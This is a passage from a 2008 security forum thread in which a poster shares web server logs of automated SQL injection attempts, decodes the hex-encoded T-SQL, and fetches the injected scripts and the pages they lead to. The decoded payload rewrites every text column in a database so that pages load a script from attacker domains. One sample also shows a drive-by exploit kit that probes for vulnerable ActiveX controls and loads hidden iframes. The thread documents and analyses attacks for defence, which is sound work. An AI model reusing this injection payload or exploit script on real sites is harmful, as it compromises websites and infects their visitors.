href="/about.asp">¹ØÓÚÎÒÃÇ</a> </div> <div id="bottom"> ·þÎñÆ÷¼°´ø¿íÓÉ <a href="http://www.zitian.cn/" target="_blank">×ÏÌïÍøÂç(Zitian.CN)</a> Ìá¹©<br /> ÎÒÒªÀ²Ãâ·ÑÍ³¼Æ Powered by <a href="http://www.ajiang.net/" target="_blank">Ajiang.net</a> Ô¥ICP±¸05009218ºÅ<br /> <script language="JavaScript">  </script> <script type="text/javascript" src="http://js.users.51.la/5.js"></script> <noscript><a href="http://www.51.la/?5" target="_blank"><img alt="我要啦免费统计" src="http://img.users.51.la/5.asp" style="border:none" /></a></noscript> </div> </div> </body> </html> <script language="JavaScript">  </script>

Code: [Select]
--12:06:53-- http://js.users.51.la/5.js => `5.js' Resolving js.users.51.la... 122.224.146.77 Connecting to js.users.51.la[122.224.146.77]:80... connected HTTP request sent, awaiting response... 200 OK
Code: [Select]
document.write ('<a href="http://www.51.la/?5" target="_blank"><img alt="我要啦免费统计 VIP 用户" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n'); // A Popular Free Statistics Service for 100 000+ Webmasters. window.onerror=function(){return true}; document.write ('<script>var a5tf="51la";var a5pu="";var a5pf="51la";var a5su=window.location;var a5sf=document.referrer;var a5of="";var a5op="";var a5ops=1;var a5ot=1;var a5d=new Date();var a5color="";if (navigator.appName=="Netscape"){a5color=screen.pixelDepth;} else {a5color=screen.colorDepth;}<\/script><script>a5tf=top.document.referrer;<\/script><script>a5pu =window.parent.location;<\/script><script>a5pf=window.parent.document.referrer;<\/script><script>a5ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a5ops=(a5ops==null)?1: (parseInt(unescape((a5ops)[2]))+1);var a5oe =new Date();a5oe.setTime(a5oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a5ops+ ";path=/;expires="+a5oe.toGMTString();a5ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a5ot==null){a5ot=1;}else{a5ot=parseInt(unescape((a5ot)[2])); a5ot=(a5ops==1)?(a5ot+1):(a5ot);}a5oe.setTime(a5oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a5ot+";path=/;expires="+a5oe.toGMTString();<\/script><script>a5of=a5sf;if(a5pf!=="51la"){a5of=a5pf;}if(a5tf!=="51la"){a5of=a5tf;}a5op=a5pu;try{lainframe}catch(e){a5op=a5su;}document.write(\'<img style="width:0px;height:0px" src="http://vip.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=19&id=5&tpages=\'+a5ops+\'&ttimes=\'+a5ot+\'&tzone=\'+(0-a5d.getTimezoneOffset()/60)+\'&tcolor=\'+a5color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a5of)+\'&vpage=\'+escape(a5op)+\'" \/>\');<\/script>');

Code: [Select]
--12:03:42-- http://www.51.la/?5 => `?5' Resolving www.51.la... 222.88.95.2 Connecting to www.51.la[222.88.95.2]:80... connected HTTP request sent, awaiting response... 200 OK
Code: [Select]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" /> <style type="text/css"> body {font-size:12px;line-height:120%;font-family:ËÎÌå;word-break: break-all;} a {color: #000;text-decoration: none} a:hover {color: #1653C2} .a1 {color: #1653C2} .a1:hover {color: #000} img {border:none} div {text-align:left} #index_menu {margin:auto;width:760px;border-bottom:2px solid #1653C2;padding:0px;height:21px;text-align:center} #index_menu ul {margin:0px;padding:4px 4px 0px 4px} #index_menu li {display:inline;} #index_menu a {color:#1653C2;padding:4px 15px 4px 15px} #index_menu a:hover {color:#000;background-color:#EFEFEF} #index_menu a.dq {color:#FFF;background-color:#1653C2} #allbody {width:760px;margin: 0 auto} #bottom {float: left;width:760px;text-align: center;margin-top:15px;border-top:1px solid #ACC1E8;padding:10px 0px;background-color:#E0E9FC;} </style> <title>ÎÒÒªÀ²Ãâ·ÑÍ³¼ÆÍ³¼Æ±¨¸æ - ¡°ÎÒÒªÀ²¡±Ìá¹©</title> </head> <body> <div style="margin:20px 0px 20px 0px;text-align:center"><img alt="ÎÒÒªÀ²Ãâ·ÑÍ³¼Æ" src="http://51img.ajiang.net/main_logo.gif" /><br /><a href="http://bbs.51.la/forum-1-1.html">ÎÒÒªÀ²Ãâ·ÑÍ³¼Æ</a></div> <div id="index_menu"> <ul> <li><a href="http://bbs.51.la/forum-1-1.html">Õ¾³¤½»Á÷´óÌü</a></li> <li><a href="./" class="dq">Ê×Ò³</a></li> <li><a href="reg.asp">ÉêÇë</a></li> <li><a href="login.asp">µÇÂ¼</a></li> <li><a href="http://top.51.la/">ÅÅÐÐ</a></li> <li><a href="news.asp">ÈÕÖ¾</a></li> <li><a href="http://help.51.la/">°ïÖú</a></li> </ul> </div> <div id="allbody"> <div style="line-height:200%;margin:35px;text-align:center"> <a class="a1" style="font-size:14px" href="report/1_main.asp?id=5">>> ²é¿´¡¼ ÎÒÒªÀ²Ãâ·ÑÍ³¼Æ ¡½µÄÍ³¼Æ±¨¸æ >></a><br /> <a style="font-size:16px" href="reg.asp">ÉêÇëÄú×Ô¼ºµÄÃâ·ÑÍ³¼ÆÕËºÅ</a> <br /><a href="about.asp" title="ÎªÊ²Ã´Ñ¡ÔñÎÒÒªÀ²Ãâ·ÑÍ³¼Æ">ÁË½âÍøÕ¾ÏÖ×´¡¤°ÑÎÕÍøÕ¾Âö²«¡¤³¬Ô½·¢Õ¹¼«ÏÞ¡ª¡ªÎÒÒªÀ²Í³¼Æ£¬Õ¾³¤ÖÇÃ÷µÄÑÛ¾¦</a> <br /><a class="a1" href="report/1_main.asp?id=1" target="_blank" style="font-size:14px"> - È« ¹¦ ÄÜ ÑÝ Ê¾ - </a> </div> <div style="width:760px;text-align: center;"> <a href="http://union.wowowang.com/" target="_blank"><img alt="¹ã¸æ" src="http://51img.ajiang.net/index_wowowang.gif" /></a> <a href="http://www.nicewords.org/" target="_blank"><img alt="¹ã¸æ" src="http://51img.ajiang.net/index_nicewords.gif" /></a> <a href="http://www.kaikai8.com/" target="_blank"><img alt="¹ã¸æ" src="http://51img.ajiang.net/index_kaikai8.gif" /></a> <a href="http://www.fenghuangchuanqi.com/?51la" target="_blank"><img alt="¹ã¸æ" src="http://51img.ajiang.net/index_fenghuangchuanqi.gif" /></a> <a href="http://www.zitian.cn/" target="_blank"><img alt="×ÏÌïÍøÂçÆ½¼ÛÓòÃû" src="http://51img.ajiang.net/index_ztdm.gif" /></a> <a href="http://www.jjoobb.cn/" target="_blank"><img alt="¹ã¸æ" src="http://51img.ajiang.net/index_jjoobb.gif" /></a> </div> <div style="margin:15px 0px;text-align:center;width:760px;line-height:20px">ÉÆÕßÎáÉÆÖ®£¬²»ÉÆÕßÎáÒàÉÆÖ®£¬µÃÉÆ¡£ÐÅÕßÎáÐÅÖ®£¬²»ÐÅÕßÎáÒàÐÅÖ®£¬µÃÐÅ¡£<br /> <span id="ajiang_51la"></span>ÉÏÉÆÈôË®¡£Ë®ÀûÍòÎï¶ø²»Õù£¬´¦ÖÚÈËÖ®Ëù¶ñ£¬¹Ë¼¸ÓÚµÀ¡£ </div> <div style="float: left;width:760px;text-align:center;margin-top:12px"> <a class="a1" href="/rule.asp">ÓÃ»§ÊØÔò</a> | <a class="a1" href="/usergetpass.asp">ÕÒ»ØÃÜÂë</a> | <a class="a1" href="/friend.asp">¹ã¸æÁªÏµ</a> | <a class="a1" href="/users.asp">µäÐÍÓÃ»§</a> | <a class="a1" href="/contact.asp">ÁªÏµÎÒÃÇ</a> | <a class="a1" href="/about.asp">¹ØÓÚÎÒÃÇ</a> </div> <div id="bottom"> ·þÎñÆ÷¼°´ø¿íÓÉ <a href="http://www.zitian.cn/" target="_blank">×ÏÌïÍøÂç(Zitian.CN)</a> Ìá¹©<br /> ÎÒÒªÀ²Ãâ·ÑÍ³¼Æ Powered by <a href="http://www.ajiang.net/" target="_blank">Ajiang.net</a> Ô¥ICP±¸05009218ºÅ<br /> <script language="JavaScript">  </script> <script type="text/javascript" src="http://js.users.51.la/5.js"></script> <noscript><a href="http://www.51.la/?5" target="_blank"><img alt="我要啦免费统计" src="http://img.users.51.la/5.asp" style="border:none" /></a></noscript> </div> </div> </body> </html> <script language="JavaScript">  </script>
Title: Re: SQL Injected jscript sites
Post by: Orac on September 20, 2008, 11:24:51 am: Code: [Select]
--12:13:46-- http://bbs.51.la/forum-1-1.html => `forum-1-1.html' Resolving bbs.51.la... 203.171.229.47 Connecting to bbs.51.la[203.171.229.47]:80... connected HTTP request sent, awaiting response... 200 OK
THis still wont post due to its size, so ive added it as an attachment.
Title: Re: SQL Injected jscript sites
Post by: JohnC on September 26, 2008, 06:39:03 pm: Thanks.
Title: Re: SQL Injected jscript sites
Post by: Orac on October 11, 2008, 11:00:04 am: Log entry
Code: [Select]
xxx.xxx.xxx.xxx - - [10/Oct/2008:16:49:11 +0000] "GET /forum/viewtopic.php?f=11&t=28980';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 524 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; AntivirXP08; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" (malwareremoval.com) "-"
Decoded, note new file location.
Code: [Select]
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www3.ss11qn.cn/csrss/new.htm"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www3.ss11qn.cn/csrss/new.htm"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
Looks as thou the site is no longer available.
Quote
[www3.ss11qn.cn]
Error getting IP Address:
No such host is known.

Quote
Retrieving DNS records for www3.ss11qn.cn...

Attempt to get a DNS server for www3.ss11qn.cn failed: www3.ss11qn.cn does not exist in the DNS
Title: Re: SQL Injected jscript sites
Post by: Orac on October 12, 2008, 01:39:55 pm: New site, we had a total of 44 differnt attempts involving this one in the overnight logs.

Log entry
Code: [Select]
xxx.xxx.xxx.xxx - - [11/Oct/2008:14:03:14 +0000] "GET /forum/viewtopic.php?f=11&t=35291';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 524 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" (malwareremoval.com) "-"
Decoded
Code: [Select]
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script> </script> <script src="http://s46.cnzz.com/stat.php?id=1084964&web_id=1084964" language="JavaScript" charset="gb2312"></script> <SCRIPT> document.write("<iframe width=50 height=0 src=flash.htm></iframe>"); document.write("<iframe width=50 height=0 src=ani.htm></iframe>"); document.write("<iframe width=100 height=0 src=cx.htm></iframe>"); document.write("<iframe width=100 height=0 src=mi.htm></iframe>"); window.status="Íê³É"; window.onerror=function(){return true;} if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1) document.write("<iframe width=20 height=0 src=06014.htm></iframe>"); try{var n; var ll=new ActiveXObject("snpvw.Snapshot Viewer Control.1");} catch(n){}; finally{if(n!="[object Error]"){document.write("<iframe width=100 height=0 src=ff.htm></iframe>");}} try{var w; var ml=new ActiveXObject("DPClient.Vod");} catch(w){}; finally{if(w!="[object Error]"){document.write("<iframe width=100 height=0 src=xl.htm></iframe>");}} function test() { rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1"; try { Like = new ActiveXObject(rrooxx); }catch(error){return;} vvvvv = Like.PlayerProperty("PRODUCTVERSION"); if(vvvvv<="6.0.14.552") document.write("<iframe width=100 height=0 src=real10.htm></iframe>"); else document.write("<iframe width=100 height=0 src=real11.htm></iframe>"); } test(); </SCRIPT> </HEAD> </HTML> <iframe width=50 height=0 src=tr.htm></iframe> <script language="javascript" type="text/javascript" src="http://js.users.51.la/2204425.js"></script> <script language="JavaScript">  </script>

Code: [Select]
--14:14:26-- http://js.users.51.la/2204425.js => `2204425.js' Resolving js.users.51.la... 121.11.69.211 Connecting to js.users.51.la[121.11.69.211]:80... connected HTTP request sent, awaiting response... 200 OK

Code: [Select]
document.write ('<a href="http://www.51.la/?2204425" target="_blank"><img alt="51.la 专业、免费、强健的访问统计" src="http://icon.ajiang.net/icon_7.gif" style="border:none" /></a>\n');

Code: [Select]
--14:18:32-- http://www.51.la/?2204425 => `?2204425' Resolving www.51.la... 222.88.95.2 Connecting to www.51.la[222.88.95.2]:80... connected HTTP request sent, awaiting response... 200 OK

Code: [Select]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" /> <style type="text/css"> body,td,p {font-size:12px;line-height:120%;font-family:ËÎÌå;word-break: break-all} input {font: 14px "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif;;padding:4px;vertical-align:middle;border:1px solid #CCCCCC;background:#fff;} p {line-height:17px;text-align:left;margin:6px 0px} a {color: #000000;text-decoration: none;} a:hover {color: #1562BF;text-decoration: none} .a1 {color: #1562BF;text-decoration: none;} .a1:hover {color: #000;text-decoration: none;} img {border:none;vertical-align:middle;} div {text-align:left} .left {float: left;} .right {float: right;} .fonts {color:#1562BF} .vcode {border: 1px solid #3C67BF;background:#DDE8FC;vertical-align: text-bottom;padding:6px;} #allbody {width:760px;margin: 0 auto} .form {padding:9px 0px 9px 20px;margin:0px;} #iright {padding:9px;width:237px;margin-right:4px;border:1px solid #999;background:#F3F3F3;filter: Alpha(Opacity=92, FinishOpacity=2); opacity:0.92;} .btlogin {border:none;background:url('images/index_bt_login.gif');width:81px;height:33px;} #it123 {margin:12px 0px;} #it123 p {line-height:17px;color:#666} #bottom {float: left;width:760px;height:62px;text-align: center;margin-top:3px;padding:20px 0px 0px 0px;background:url('../images/bottom_bg.gif')} #userlogin {height:270px;width:100%;} #guestin {height:270px;width:100%;} </style> <title>´óÅ£XÍ³¼Æ±¨¸æ - ¡°ÎÒÒªÀ²¡±Ìá¹©</title> </head> <body style="margin-top:12px"> <div id="allbody"> <div id="tops" style="width:760px;height:55px"> <div class="left"><img src="images/index_logo.gif" alt="ÎÒÒªÀ²Ãâ·ÑÍøÕ¾·ÃÎÊÍ³¼ÆÏµÍ³" /></div> <div class="right"><p style="text-align:right;padding:0px;margin:0px"> <a href="http://old.51.la/" class="a1">»³Äî¾É°æ</a> | <a href="reg.asp">Ãâ·ÑÉêÇë</a> | <a href="login.asp">µÇÂ¼</a> | <a href="http://bbs.51.la/" target="_blank">Õ¾³¤½»Á÷´óÌü</a> | <a href="http://top.51.la/" target="_blank">ÅÅÐÐ°ñ</a> | <a href="news.asp">ÈÕÖ¾</a> | <a href="http://help.51.la/">°ïÖú</a></p> <p style="text-align:right;padding:2px 0px 0px 0px;margin:0px;color:red"><img src="images/index_zhuyi.gif" alt="×¢Òâ" /> ×¢Òâ: ÄúÒÑ¾Àë¿ª¸Õ²Å·ÃÎÊµÄÍøÕ¾ £¬½øÈëÁË 51.La Ãâ·ÑÍ³¼Æ·þÎñÍøÕ¾</p> </div> </div> <div id="bodys" style="width:760px;height:auto;overflow:hidden;background:url('images/index_show.jpg') no-repeat 0px 25px">  <div class="right" id="iright"> <div id="userlogin" style="display:none"> <img src="images/index_rtext_login.gif" alt="ÎÒÒªÀ²ÓÃ»§µÇÂ¼" /> <form id="f1" action="login.asp" method="post" class="form"> <p>ÓÃ»§Ãû <input name="uname" id="uname" style="width:140px" /></p> <p>ÃÜ¡¡Âë <input type="password" name="upass" id="upass" style="width:140px" /></p> <p>ÑéÖ¤Âë <input name="vcode" id="vcode" style="width:45px" /> ÇëÊäÈë <span class="vcode"><img alt="ÑéÖ¤Âë" src="user/vcode.asp" style="height:10px;width:40px" /></span></p> <p> <input type="submit" value="   " class="btlogin" />    <a href="reg.asp"><img src="images/index_bt_reg.gif" alt="Ãâ·Ñ×¢²á" /></a> </p> <p style="padding:9px 0px 6px 0px;text-indent: -3px;"><input type="checkbox" name="remb" value="yes" style="border:none;background:#F3F3F3;" />¼Ç×¡Õâ¸öÉí·Ý£¨¹²ÓÃµçÄÔÕßÉ÷ÓÃ£©</p> <p><a href="usergetpass.asp" class="a1">Íü¼ÇÁËÃÜÂë£¿</a> <br /><a href="about.asp" class="a1">ÉîÈëÁË½âÎÒÒªÀ²Ãâ·ÑÍ³¼Æ¡¡</a> <br /> </p> </form> </div> <div id="guestin"> <img src="images/index_rtext_report.gif" alt="²é¿´ÓÃ»§Í³¼Æ±¨±í" /> <div class="form"> <form target="_top" action="report/0_help.asp" method="post" style="padding:0px;margin:0px"> <p class="fonts">ÓÃ»§ÍøÕ¾¡¾´óÅ£X¡¿</p> <p>±¨±íÎ´¹«¿ª<br />ÇëÊäÈë¶ÀÁ¢²é¿´ÃÜÂëÒÔ´ò¿ª±¨±í</p> <input type="hidden" name="id" value="2204425" /> <input type="hidden" name="t" value="chalogin" /> <p>²é¿´È¨ÃÜÂë <input name="lookpass" type="password" size="14" /></p> <p style="padding:5px 0px 12px 0px;"><input type="submit" value="   " class="btlogin" /></p> </form> <p><a href="http://help.51.la/faq/#17" target="_blank" class="a1">Ê²Ã´ÊÇ¶ÀÁ¢²é¿´ÃÜÂë?</a></p> <p><a href="#" onclick="document.getElementById('userlogin').style.display='';document.getElementById('guestin').style.display='none';return false;" class="a1">ÇÐ»»µ½ÓÃ»§µÇÂ¼½çÃæ </p> </div> </div> <img src="images/index_rtext_reg.gif" alt="Ãâ·Ñ×¢²áÎÒÒªÀ²ÓÃ»§" /> <div class="form"> <p><a href="reg.asp"><img src="images/index_regnow.gif" alt="Á¢¼´Ãâ·ÑÉêÇë" /></a><br /><a href="report/1_main.asp?id=1" class="a1">¹Û¿´¹¦ÄÜÑÝÊ¾</a> </p> </div> </div>  <div class="left" style="width:492px"> <div style="height:17px;padding-top:8px"><img src="images/index_loveme.gif" alt="ÖÐÎÄÕ¾³¤±Ø±¸¹¤¾ß" /></div> <div><img src="images/index_showtop.jpg" alt="·âÃæ" usemap="#Map" /></div> <map name="Map"><area shape="rect" coords="320,120,425,143" href="report/1_main.asp?id=1" alt="µã»÷¹Û¿´¹¦ÄÜÑÝÊ¾" target="_blank"></map> <div id="it123"> <table> <tr><td style="width:50px;text-align:center;"><img src="images/index_1.gif" alt="ÄúÕæµÄÁË½âÄúµÄÕ¾µãÂð£¿" /><br /><br /><br /></td><td><img src="images/index_1b.gif" alt="ÄúÕæµÄÁË½âÄúµÄÕ¾µãÂð£¿" /><p>Ã¿ÌìÓÐ¶àÉÙÈË·ÃÎÊÄúµÄÍøÕ¾? ÏÖÔÚÓÐËÕýÔÚÄúµÄÍøÕ¾ÉÏ? ËûÃÇ×öÁËÊ²Ã´?<br />ËûÃÇ´ÓºÎ¶øÀ´? ËÑË÷ÒýÇæÎªÄú´øÀ´¶àÉÙµã»÷? ·ÃÎÊÕßËÑË÷µÄ¹Ø¼ü´ÊÊÇÊ²Ã´?<br />ÄúµÄÄÄ¸öÀ¸Ä¿ÄÄ¸öÍøÒ³¸üÊÜ»¶Ó? ¡¡</p></td></tr> <tr><td style="width:50px;text-align:center;"><img src="images/index_2.gif" alt="ÎÒÒªÀ²Ãâ·ÑÍ³¼Æ¾ÍÊÇÄúÖÇÃ÷µÄÑÛ¾¦£¡" /><br /><br /><br /></td><td><img src="images/index_2b.gif" alt="ÎÒÒªÀ²Ãâ·ÑÍ³¼Æ¾ÍÊÇÄúÖÇÃ÷µÄÑÛ¾¦£¡" /><p>³ÉÊì¡¢ÍêÉÆ¡¢ÈËÐÔ»¯µÄ¹¦ÄÜÉè¼Æ£¬·ûºÏ²¢Òýµ¼×ÅÖÐÎÄÕ¾³¤Ê¹ÓÃÏ°¹ß¡£<br />ÓÐÁËÎÒÒªÀ²Ãâ·ÑÍ³¼Æ£¬ÄúµÄÎÊÌâ½«ÓÈÐ¶ø½â£¡<br /><br /></p></td></tr> <tr><td style="width:50px;text-align:center;"><img src="images/index_3.gif" alt="ÖªÃûµÄÕ¾³¤ÉçÇø" /><br /><br /><br /></td><td><img src="images/index_3b.gif" alt="ÖªÃûµÄÕ¾³¤ÉçÇø" /><p>³©ÓÎÎÒÒªÀ²Õ¾³¤½»Á÷´óÌü£¬½áÊ¶ÈÈÇé¡¢ÓÑÉÆ¡¢³ÉÊìµÄ»¥Á¬ÍøÍ¬ÐÐ£¬<br />ÄúµÄÊÓÒ°»á¸ü¼Ó¿ªÀ«£¬Õ¾µã½¨ÉèºÍÍÆ¹ã½«¸ü¼ÓµÃÐÄÓ¦ÊÖ¡£<br /><br /></p></td></tr> </table> </div> </div> </div> <div style="width:760px;text-align: center;margin-bottom:18px;float: left;"> <a href="http://www.firstdh.com/reg.php" target="_blank"><img alt="¹ã¸æ" src="http://51img.ajiang.net/index_firstdh.gif" /></a> <a href="http://www.15ai.com/spltb.html" target="_blank"><img alt="¹ã¸æ" src="http://51img.ajiang.net/index_15ai.gif" /></a> <a href="http://www.kaikai8.com/" target="_blank"><img alt="¹ã¸æ" src="http://51img.ajiang.net/index_kaikai8.gif" /></a> <a href="http://www.9v.cn/" target="_blank"><img alt="¹ã¸æ" src="http://51img.ajiang.net/index_9v.gif" /></a> <a href="http://www.leledh.com/add.asp" target="_blank"><img alt="¹ã¸æ" src="http://51img.ajiang.net/index_leledh.gif" /></a> <a href="http://www.jjoobb.cn/" target="_blank"><img alt="¹ã¸æ" src="http://51img.ajiang.net/index_jjoobb.gif" /></a> </div>  <div style="float: left;width:760px;text-align:center;margin-top:0px"> <a class="a1" href="/rule.asp">ÓÃ»§ÊØÔò</a> | <a class="a1" href="/usergetpass.asp">ÕÒ»ØÃÜÂë</a> | <a class="a1" href="/friend.asp">¹ã¸æÁªÏµ</a> | <a class="a1" href="/users.asp">µäÐÍÓÃ»§</a> | <a class="a1" href="/contact.asp">ÁªÏµÎÒÃÇ</a> | <a class="a1" href="/about.asp">¹ØÓÚÎÒÃÇ</a> </div> <div id="bottom"> ·þÎñÆ÷¼°´ø¿íÓÉ <a href="http://www.zitian.cn/" target="_blank">×ÏÌïÍøÂç(Zitian.CN)</a> Ìá¹©<br /> ÎÒÒªÀ²Ãâ·ÑÍ³¼Æ Powered by <a href="http://www.ajiang.net/" target="_blank">Ajiang.net</a> °æÈ¨ËùÓÐ 2002-2008 Ô¥ICP±¸05009218ºÅ<br /> <script language="JavaScript">  </script> <script type="text/javascript" src="http://js.users.51.la/5.js"></script> <noscript><a href="http://www.51.la/?5" target="_blank"><img alt="我要啦免费统计" src="http://img.users.51.la/5.asp" style="border:none" /></a></noscript> </div> </div> </body> </html> <script language="JavaScript">  </script>
Title: Re: SQL Injected jscript sites
Post by: JohnC on October 14, 2008, 03:55:19 pm: Thanks.